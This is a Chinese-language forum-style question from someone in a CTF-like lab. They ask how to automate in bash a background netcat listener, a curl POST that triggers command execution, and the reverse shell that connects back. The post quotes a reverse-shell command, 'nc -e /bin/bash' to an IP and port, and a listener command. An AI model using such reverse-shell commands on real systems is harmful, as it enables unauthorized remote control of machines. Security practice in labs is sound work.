我正在做一个练习(基本上只是一个CTF),我们对一些易受攻击的机器进行了一些攻击。例如,通过发送特制的帖子请求,我们可以让它执行例如
nc -e /bin/bash 10.0.0.2 2546
我想要做的就是以自己的方式编写脚本,以使其更容易。
这不是关于如何破解或升级权限的帖子,但我的脚本功能(特别是在bash!中)并不是最好的。
问题是当我到达第2步时。出于显而易见的原因,我在发送帖子请求之前无法启动nc -lvp 1234,因为它会阻止。而且我每天都很确定bash中的多线程是不可能的......(有人可能已经做过了。)
nc -lp $lp & # Run in background - probably not a good solution
curl -X POST $url --data "in_command=do_dirty_stuff" # Send data
* MAGIC CONNECTION *
让我们说我实际上已经成功连接回家了,在向用户提供工作shell之前,我如何设法从我的脚本中发送数据,虽然是netcat?也许将netcat数据传递给文件,并将其用作“缓冲区”?
我知道有很多问题,一个答案无法回答,但我想更多地了解人们会如何做到这一点。或者如果在bash中完全荒谬的话。